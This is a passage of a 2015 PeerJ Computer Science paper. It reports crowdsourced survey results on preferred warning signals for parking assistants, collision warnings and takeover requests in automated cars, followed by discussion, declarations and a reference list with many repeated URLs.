FCWSfut 82 123 203 377 420 FSannoy 126 218 346 309 206 FSfut 204 222 312 301 166 FACpref 204 252 264 292 193 Figure 2 Distribution of the age of the respondents aged between 18 and 54 years. Figure 5 shows associations between the opinion of the respondents on annoyance and helpfulness of the PA and FCWS and their age divided into 5-year wide bins. Figure 5A shows that younger respondents found that both the PA (ρ = −0.05,p = .103) and the FCWS (ρ = −0.14,p < .001) were more annoying, but these effects were weak. The Bazilinskyy and De Winter (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.13 13/28 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.13 Figure 3 Distribution of responses for the question: “In which year do you think that most cars will be able to drive fully automatically in your country of residence?” (Q30). Years were divided into 5-year-wide bins. Figure 4 Opinion of the respondents on whether a PA and FCWS are helpful and annoying, and whether they would like to have automated versions of such systems in their cars in the future. Spearman correlation between the respondents’ age and the reported annoyance of the FS was weak as well (ρ = 0.06,p = .035). Figure 5B shows that the perceived helpfulness of the FCWS (ρ = 0.12,p < .001) slightly increased with age. People who found the PA annoying typically indicated that the FCWS was also annoying (ρ = 0.47, p < .001), and respondents who thought that the PA was helpful, considered the FCWS to be helpful as well (ρ = 0.34,p < .001). Figure 6 shows the respondents’ opinion on the proposed future system. The respondents were asked whether they would find such a system annoying (Q24) and whether they would prefer to use such a system instead of opening windows while driving in a fully automated car through a scenic place (Q25). A large portion of the respondents was neutral in their responses: 346 people chose the option Neither agree nor disagree in Q24, and 312 persons chose the same option in Q25. Bazilinskyy and De Winter (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.13 14/28 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.13 Figure 5 Opinion on the annoyance and helpfulness of the parking assistant (PA), forward collision warning system (FCWS), and future system (FS). (A) Opinion on the annoyance of the PA (Q16), FCWS (Q21), and FS (Q24) as a function of age; (B) Opinion on the helpfulness of the PA (Q15) and FCWS (Q20) as a function of age. Age was divided into 5-year-wide bins. Figure 6 Distribution of opinions on whether the proposed future system (FS) would be annoying (Q24) and whether the respondents would prefer the system to opening windows in fully automated cars (Q25). In Q27 the respondents were asked to report on the types of feedback that they would like to be supported by in case of a takeover request during highly automated driving. The respondents were allowed to select multiple options. Figure 7 shows that a large number of people preferred auditory feedback provided by a female voice saying ‘Take over please’ (N = 514). The number of respondents who chose the option with the male voice was considerably lower (N = 244). Figure 7 makes a distinction between the numbers of female Bazilinskyy and De Winter (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.13 15/28 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.13 Figure 7 Preference for particular takeover requests during highly automated driving. Numbers of respondents who indicated a preference for a particular takeover request during highly automated driving in the question: “Now imagine again that you are driving in an automated car (that can perform certain tasks without any interaction from the humans in the car). However, the automation cannot handle all possible situations, and you sometimes have to take over control. What type of warning signal would you like to receive in case manual take over is required?” (Q27). Each bar is supplemented by the corresponding ‘risk ratios’ of female respondents, calculated as the proportion of females who indicated this answer divided by the proportion of males who indicated this answer. If the risk ratio is greater than 1, females are overrepresented. Conversely, if the risk ratio is smaller than 1, females are underrepresented. 95% confidence intervals are shown in parentheses. and male respondents. It is apparent that both female and male respondents preferred the female over the male voice. Other types of auditory feedback were reported in the following order: two beeps (N = 375), one beep (N = 195), a bell sound (N = 194), and a horn sound (N = 135). The respondents indicated a high level of support for both visual signals offered in the question: a warning message projected on the windscreen ‘Take over please’ (N = 429) and a warning light (N = 406). However, respondents showed a relatively low level of acceptance of the offered variations of a vibration interface: vibrations in the seat (N = 341), vibrations in the steering wheel (N = 179), vibrations in the seatbelt (N = 117), and vibrations in the floor (N = 64). Furthermore, the results seem to suggest that female respondents were less likely than male respondents to prefer a female voice. Figure 8 shows the opinion of the respondents on the combinations of warning signals. The figure shows that most people (N = 188) preferred a sound signal (i.e., one or two beeps, a horn, or bell) without additional information. A large number of people indicated that they would like to receive a combination of all four modalities (N = 170) or the combination of a sound signal, a visual message, and a voice (N = 101). Cross-national differences in opinion for feedback for takeover requests Next, we tested the hypothesis whether peoples’ preference for a female and male voice in supporting takeover requests in highly automated driving was different between English and non-English speaking countries. Figure 9 presents a scatter plot, showing the numbers Bazilinskyy and De Winter (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.13 16/28 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.13 Figure 8 Preference to combinations of types of signals for aiding takeover requests during highly automated driving (Q27). All possible combinations are listed. Hence, the total number of respondents adds up to 1,205. Figure 9 Numbers of respondents from English and non-English speaking countries who indicated a preference for a male and a female voice for a takeover request during highly automated driving (Q27). The dashed line represents the ratio between the number of respondents who preferred a female voice and the number of respondents who preferred a male voice. The solid line is the line of unity. No labels are shown for countries with five or less respondents indicating a male voice, to support the clarity of the figure. Country abbreviations are listed according to ISO 3166-1 alpha-3. of respondents per country who indicated that they would like to receive a female or a male voice. The overall percentage of respondents who expressed preference for a female voice was 43% (514/1,205), and the overall percentage of people who expressed preference for a male voice was 20% (244/1,205). The corresponding percentages were 42% (71/168) and 22% (37/168) for English speaking countries, and they were 43% (443/1,037) and 20% (207/1,037) for non-English speaking countries. The differences between English speaking countries and non-English speaking countries were not statistically significant (female voice: RR = 0.99, 95% CI [0.82–1.20]; male voice: RR = 1.10, 95% CI [0.81–1.50]). Bazilinskyy and De Winter (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.13 17/28 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.13 Analyses of textual comments The respondents provided their feedback on the disadvantages of the PA in Q17. The responses that were less than five characters long (N = 181) or that were not written in English (N = 39) were ignored. Comments were processed before data filtering and were hence based on all 2,000 responses. 12.4% of the respondents (N = 151) provided negative feedback on the auditory interfaces in parking assistants. Many people (N = 135) indicated that PA systems were annoying, for example: “Sound should not be too loud and annoying” and “I think it could be annoying especially when your focusing”. Thirty-seven respondents pointed out that the PA used overly loud sounds. Several answers to the question contained comments that the PA sounds can be distracting (N = 21) and inaccurate (N = 48). Five respondents indicated that they would prefer feedback in other types of modalities, for example: “annoying, use something else instead of the constant loud beeping sounds” and “The sound, a voice message would be better”. Five respondents indicated that the PA systems cannot be used by deaf people. The respondents indicated their opinion on the disadvantages of the FCWS in Q23. The responses that were less than five characters long (N = 276) or that were not written in English (N = 35) were not included in the analysis. Sixteen respondents indicated that the auditory feedback used in FCWS was annoying, for example: “This situation might come up too often so the warning sound may get annoying fast” and “The beeps might feel annoying”. Next, the respondents were asked to comment on possible advantages and disadvantages of the FS in Q26. The responses that were less than five characters long (N = 138) or that were not written in English (N = 46) were not included in the analysis. In total, 1,249 comments were analysed. A collection of mixed responses was received. Overall, more comments were classified as positive (N = 132) than negative (N = 52) to the FS. However, the respondents also pointed out concerns about a number of characteristics that they as- sociated with the system: annoyance to both the driver and to other road users in the traffic (N = 101), distraction (N = 47), and loudness (N = 28). Fifty-five respondents expressed their concerns that the system would be impractical; however, most of such concerns could be associated with the lack of understanding of the concept of a fully automated car. Certain respondents showed a high level of negativity caused by an apparent lack of un- derstanding the concept of filtering only specific sounds coming from the outside environ- ment. Examples are: “You can not hear some bells or signal from other cars”, “Main disad- vantage: makes driver unaware of any dangers”, “If car noises are filtered out how would you hear if another car is incoming”, and “I feel that filtering other car noise may be dangerous”. In Q27 the respondents were asked to indicate their preference for types of interfaces to be used for takeover requests in HAD. One of the options in that question was “Other”. If respondents selected this option, they were invited to provide further comments in Q28. The responses that were less than five characters long (N = 32) or that were not written in English (N = 1) were ignored. In total, 22 responses were analysed. One respondent indi- cated that he/she would prefer to be aided by continuous beeps until he/she reclaimed con- trol. Another respondent stated “steering wheel up or down motion to signal steering wheel usage needed, accompanied by a specific message”. One respondent mentioned that inter- Bazilinskyy and De Winter (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.13 18/28 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.13 faces used in such scenario need to be adaptive depending on the urgency of the request “It honestly depends on the situation the car needs me to take over for. Does it affect anyone’s safety at all? Does it actually /need/ to be done straight away? Is it critically important in any other way? In those cases I’d obviously like a very noticeable signal however ‘annoying’ it may be. In other situations however I’d prefer a decent text message or a gentle reminder”. DISCUSSION The aim of this study was to obtain opinions on preferred feedback types for takeover requests in HAD from a large number of people coming from all over the globe. Additionally, the aim was to measure perceived helpfulness and annoyance of auditory interfaces for three systems. Specifically, the respondents who participated in the survey were presented with two existing systems used in modern vehicles (a parking assistant [PA] & a forward collision warning system [FCWS]) and one futuristic setup (FS) envisioned for FAD. Respondents were asked whether they would consider using the proposed FS in future automated vehicles. Our survey helped us to gather opinions from people before technology is actually available. Previous research suggests that the modality of aiding systems in automated cars should be chosen carefully to avoid frustration of people who will be using such vehicles and to increase safety of automation on public roads. Stanton, Young & McCaulder (1997) expressed concerns that interfaces currently employed in ACC do not support the understanding of the behaviour and limitations of the system. A driving simulator study by Adell et al. (2008) provided a comprehensive analysis of combinations of interfaces for supporting safe driving. Participants in that study were most positive about the haptic interface, while the auditory warning signals were not highly appreciated, which may be explained by the nature of the experiment that exposed the participants to a high urgency scenario of avoiding rear-end collisions (Adell et al., 2008). Findings from the aviation field show that the female voice is more difficult to understand in noisy environments (Nixon et al., 1998a). It has also been argued that the female voice has the advantage that it stands out more in a predominantly male environment, such as the military (Noyes, Hellier & Edworthy, 2006). Differences in speech intelligibility and perceived urgency between male and female voices are generally small and findings have been mixed (e.g., Arrabito, 2009; Edworthy, Hellier & Rivers, 2003; Nixon et al., 1998b). However, it has been found that most people normally use a female voice when using their route navigation device (Large & Burnett, 2013). In the present research, respondents were asked to select the types of interfaces they are willing to be guided by during a takeover request. The results of our survey further showed that the female voice is preferred in both English and non-English speaking countries. Thus, our findings reinforce the idea that the overall most preferred way to support the transition of control is an auditory instruction performed with a female voice. Note that determining the language of respondents based on their IP address cannot guarantee accurate results in all cases. In future surveys adding a question prompting for the participant’s spoken language may yield more accurate results. Bazilinskyy and De Winter (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.13 19/28 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.13 It was found that the participants showed a relatively low level of appreciation of vibratory interfaces, which contrasts with the findings in Adell et al. (2008). This could be due to the fact that only a small number of systems that feature vibratory feedback are available in modern vehicles. A relatively large number of people indicated that they would like to be aided by all four proposed modalities. In addition, a large number of respondents indicated that the combination of a sound signal, a visual message, and a vibration signal would be preferable during takeover requests in highly automated driving. This is a surprising finding as such a combination is not common in current cars. A possible explanation of this finding could be that the respondents misinterpreted the question and instead of indicating their preference for multimodal feedback, expressed their preferences for the types of feedback that can be used separately from each other during takeover requests in highly automated driving. Another limitation of the present study is that we did not vary possible parameters of the feedback signals, including the quality, intensity, timing, and speed of delivery of the takeover requests. Future experimental research could investigate the effects of such parameters. The existing systems—the PA and FCWS—received favourable ratings, which may not be surprising, since these systems have already been tested and are already available on the market. One limitation in this context is that the participants relied on a narrative description, complemented with a visual illustration; the survey did not contain actual examples of auditory cues. Before the initiation of the survey, it was believed that the proposed FS would be seen as a way to enhance the enjoyment of driving a car through a scenic place. The results showed that the participants were rather sceptical about such a concept: the system was perceived as somewhat annoying, with a mean score of 3.21 to question Q24 on the scale from disagree strongly (1) to agree strongly (5). The proposed FS was not highly rated, possibly because the concept was perceived as a bad idea, because of a lack of previous experience with such system, or because people could not envision it due to the lack of a realistic representation (see also the analysis of the textual comments). It should also be noted that a large proportion of respondents selected the middle option Neither agree nor disagree, possibly indicating difficulties with understanding the concept of the proposed system (for studies into middle category endorsement, see Kulas, Stachowski & Haynes, 2008; Kulas & Stachowski, 2009; Sturgis, Roberts & Smith, 2012). Small effects of age on the acceptance of FAD were previously reported by Payre, Cestac & Delhomme (2014). In the present study, we also observed small age effects regarding the self-reported annoyance of the three proposed systems: younger participants saw the PA and FCWS as more annoying than older respondents did. However, young respondents perceived the FS as less annoying than the older respondents. It is known that younger peo- ple are more likely to accept new technologies (Lee, 2007; Tacken et al., 2005), and thus may be more successful at envisioning such abstract concepts as the FS. A somewhat stronger age effect was observed regarding helpfulness: older respondents found the FCWS more helpful than the younger participants. It is known that young people feel more confident behind the wheel (Matthews & Moran, 1986; Lee et al., 2002; Lee, 2007; Clarke, Ward & Truman, 2005), and therefore may think they need less external help than older drivers. Bazilinskyy and De Winter (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.13 20/28 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.13 CrowdFlower offers a platform that supports full anonymity of participants. This anonymity may have encouraged respondents to express their thoughts freely, without the fear of being judged by the organizers of the survey. All but the last free-response items required people to enter at least one character. A large number of respondents did not provide meaningful comments. However, a substantial portion of respondents did provide valuable answers, facilitating the understanding of what people think about not only the use of auditory interfaces in future highly and fully automated cars, but also about the concept of automated driving in general. Numerous respondents expressed their concerns about the qualities of current PA and FCWS systems. Some participants suggested that they want to be aided by visual and vibratory feedback in addition to auditory feedback. A number of people indicated the inaccessibility of modern PAs and FCWSs to deaf users. However, current systems also provide haptic and/or visual cues (BMW, 2013; Volvo, 2013b; Ford, 2014; Honda, 2014), and so people with a hearing impairment could still benefit from such multimodal feedback. Some respondents were sceptical about the introduction of highly and fully automated vehicles, which may be related to general consumer scepticism about new technologies. Respondents expected that most cars would drive fully automatically by the year 2030 (median value), a result that matches findings in previously published research (Sommer, 2013; De Winter et al., 2015; Kyriakidis, Happee & De Winter, 2015). The total cost of the study performed by means of a crowdsourced online-based survey was lower than what is offered by companies that conduct similar surveys with help of classic recruitment methods (De Winter et al., 2015). A group of people filled in the survey more than once, and we reasoned that their responses ought not to be trusted. Thus, we applied a strict filter, and removed all respondents who filled out the survey more than once. We also excluded all people who had one or more missing items. With appropriate data quality control mechanisms, crowdsourcing is known to be a powerful research tool (Howe, 2006; Kittur, Chi & Suh, 2008; Mason & Suri, 2012; Crump, McDonnell & Gureckis, 2013). Nonetheless, as with any self-report questionnaire, the validity of the results is limited to what people can imagine or retrieve from their memory. Furthermore, CrowdFlower respondents are not representative of the entire population of stakeholders of future HAD cars. It is likely that highly automated vehicles will initially be purchased by wealthy people, while projects on CrowdFlower are often completed by people from low-income countries (Kyriakidis, Happee & De Winter, 2015). In conclusion, the present survey study showed that the PA and FCWS were well appreciated by respondents, whereas the proposed future system (FS) was not rated highly. A second conclusion is that the female voice is the most preferred takeover request among the offered options. The scientific community and the automotive industry may be able to use the information gathered in the present survey for the development of automated driving systems, in particular future iterations of parking assistants and forward collision warning systems, as well as for the design of human-machine interfaces for automated driving. Bazilinskyy and De Winter (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.13 21/28 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.13 ACKNOWLEDGEMENTS We would like to express our special gratitude to Daria Nikulina for designing the illustrations used in the survey. ADDITIONAL INFORMATION AND DECLARATIONS Funding The research presented in this paper is being conducted in the project HFAuto–Human Factors of Automated Driving (PITN-GA-2013-605817). The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: HFAuto–Human Factors of Automated Driving: PITN-GA-2013-605817. Competing Interests The authors declare there are no competing interests. Author Contributions • Pavlo Bazilinskyy conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper, organised outsourcing of creation of illustrations. • Joost de Winter conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. Human Ethics The following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): The research was approved by the Human Research Ethics Committee (HREC) of the Delft University of Technology. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/ 10.7717/peerj-cs.13#supplemental-information. REFERENCES Adell E, Varhelyi A, Fontana MD, Bruel L. 2008. Test of HMI alternatives for driver support to keep safe speed and safe distance—a simulator study. The Open Transportation Journal 2:53–64 DOI 10.2174/1874447800802010053. Bazilinskyy and De Winter (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.13 22/28 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.13#supplemental-information http://dx.doi.org/10.7717/peerj-cs.13#supplemental-information http://dx.doi.org/10.7717/peerj-cs.13#supplemental-information http://dx.doi.org/10.7717/peerj-cs.13#supplemental-information http://dx.doi.org/10.7717/peerj-cs.13#supplemental-information http://dx.doi.org/10.7717/peerj-cs.13#supplemental-information http://dx.doi.org/10.7717/peerj-cs.13#supplemental-information http://dx.doi.org/10.7717/peerj-cs.13#supplemental-information http://dx.doi.org/10.7717/peerj-cs.13#supplemental-information http://dx.doi.org/10.7717/peerj-cs.13#supplemental-information http://dx.doi.org/10.7717/peerj-cs.13#supplemental-information http://dx.doi.org/10.7717/peerj-cs.13#supplemental-information http://dx.doi.org/10.7717/peerj-cs.13#supplemental-information http://dx.doi.org/10.7717/peerj-cs.13#supplemental-information http://dx.doi.org/10.7717/peerj-cs.13#supplemental-information http://dx.doi.org/10.7717/peerj-cs.13#supplemental-information http://dx.doi.org/10.7717/peerj-cs.13#supplemental-information http://dx.doi.org/10.7717/peerj-cs.13#supplemental-information http://dx.doi.org/10.7717/peerj-cs.13#supplemental-information http://dx.doi.org/10.7717/peerj-cs.13#supplemental-information http://dx.doi.org/10.7717/peerj-cs.13#supplemental-information http://dx.doi.org/10.7717/peerj-cs.13#supplemental-information http://dx.doi.org/10.7717/peerj-cs.13#supplemental-information http://dx.doi.org/10.7717/peerj-cs.13#supplemental-information http://dx.doi.org/10.7717/peerj-cs.13#supplemental-information http://dx.doi.org/10.7717/peerj-cs.13#supplemental-information http://dx.doi.org/10.7717/peerj-cs.13#supplemental-information http://dx.doi.org/10.7717/peerj-cs.13#supplemental-information http://dx.doi.org/10.7717/peerj-cs.13#supplemental-information http://dx.doi.org/10.7717/peerj-cs.13#supplemental-information http://dx.doi.org/10.7717/peerj-cs.13#supplemental-information http://dx.doi.org/10.7717/peerj-cs.13#supplemental-information http://dx.doi.org/10.7717/peerj-cs.13#supplemental-information http://dx.doi.org/10.7717/peerj-cs.13#supplemental-information http://dx.doi.org/10.7717/peerj-cs.13#supplemental-information http://dx.doi.org/10.7717/peerj-cs.13#supplemental-information http://dx.doi.org/10.7717/peerj-cs.13#supplemental-information http://dx.doi.org/10.7717/peerj-cs.13#supplemental-information http://dx.doi.org/10.7717/peerj-cs.13#supplemental-information http://dx.doi.org/10.7717/peerj-cs.13#supplemental-information http://dx.doi.org/10.7717/peerj-cs.13#supplemental-information http://dx.doi.org/10.7717/peerj-cs.13#supplemental-information http://dx.doi.org/10.7717/peerj-cs.13#supplemental-information http://dx.doi.org/10.7717/peerj-cs.13#supplemental-information http://dx.doi.org/10.2174/1874447800802010053 http://dx.doi.org/10.7717/peerj-cs.13 Alicandri E, Moyer MJ. 1992. Human factors and the automated highway system. Proceedings of the Human Factors and Ergonomics Society Annual Meeting 36:1064–1067 DOI 10.1518/107118192786749793. Arrabito GR. 2009. Effects of talker sex and voice style of verbal cockpit warnings on performance. Human Factors 51:3–20 DOI 10.1177/0018720808333411. Bainbridge L. 1983. Ironies of automation. Automatica 19:775–779 DOI 10.1016/0005-1098(83)90046-8. Banks VA, Stanton NA, Harvey C. 2014. Sub-systems on the road to vehicle automation: Hands and feet free but not ‘mind’ free driving. Safety Science 62:505–514 DOI 10.1016/j.ssci.2013.10.014. Barón A, Green P. 2006. Safety and usability of speech interfaces for in-vehicle tasks while driving: a brief literature review. Technical Report No. UMTRI-2006-5. Ann Arbor: Transportation Research Institute, University of Michigan. Available at http://www.umich.edu/∼driving/ publications/UMTRI-2006-5a.pdf (accessed 13 July 2015). Begault DR. 1993. Head-up auditory displays for traffic collision avoidance system advisories: a preliminary investigation. Human Factors 35:707–717 DOI 10.1177/001872089303500409. Beiker SA. 2012. Legal aspects of autonomous driving: the need for a legal infrastructure that permits autonomous driving in public to maximize safety and consumer benefit. Santa Clara Law Review 52:1145–1561. Belz SM, Robinson GS, Casali JG. 1999. A new class of auditory warning signals for complex systems: auditory icons. Human Factors 41:608–618 DOI 10.1518/001872099779656734. Bergenhem C, Pettersson H, Coelingh E, Englund C, Shladover S, Tsugawa S. 2012. Overview of platooning systems. In: Proceedings of the 19th ITS world congress, Vienna, Austria. Available at http://publications.lib.chalmers.se/records/fulltext/174621/local 174621.pdf (accessed 13 July 2015). BMW. 2013. BMW ConnectedDrive from A to Z. Available at http://www.bmw.com/com/en/ insights/technology/connecteddrive/2013/a to z/index.html (accessed 7 November 2014). BMW. 2014. BMW X5: park assistant. Available at http://www.bmw.com/com/en/newvehicles/x/x5/ 2013/showroom/driver assistance/park assistant.html#t=l (accessed 12 November 2014). Bosker B. 2013. Why Siri’s voice is now a man (and a woman). Available at http://www. huffingtonpost.com/2013/06/11/siri-voice-man-woman n 3423245.html (accessed 18 December 2014). Braitman KA, McCartt AT, Zuby DS, Singer J. 2010. Volvo and Infiniti drivers’ experiences with select crash avoidance technologies. Traffic Injury Prevention 11:270–278 DOI 10.1080/15389581003735600. Brandenburg S, Skottke E. 2014. Switching from manual to automated driving and reverse: are drivers behaving more risky after highly automated driving? In: Proceedings of the IEEE 17th international conference on intelligent transportation systems (ITSC), Qingdao, China. 2978–2983. Bregman AS. 1990. Auditory scene analysis: the perceptual organization of sound. Cambridge, MA: MIT Press. Bronkhorst AW, Veltman JA, Van Breda L. 1996. Application of a three-dimensional auditory display in a flight task. Human Factors 38:23–33 DOI 10.1518/001872096778940859. Clarke DD, Ward P, Truman W. 2005. Voluntary risk taking and skill deficits in young driver accidents in the UK. Accident Analysis & Prevention 37:523–529 DOI 10.1016/j.aap.2005.01.007. Bazilinskyy and De Winter (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.13 23/28 https://peerj.com/computer-science/ http://dx.doi.org/10.1518/107118192786749793 http://dx.doi.org/10.1177/0018720808333411 http://dx.doi.org/10.1016/0005-1098(83)90046-8 http://dx.doi.org/10.1016/j.ssci.2013.10.014 http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://www.umich.edu/~driving/publications/UMTRI-2006-5a.pdf http://dx.doi.org/10.1177/001872089303500409 http://dx.doi.org/10.1518/001872099779656734 http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf 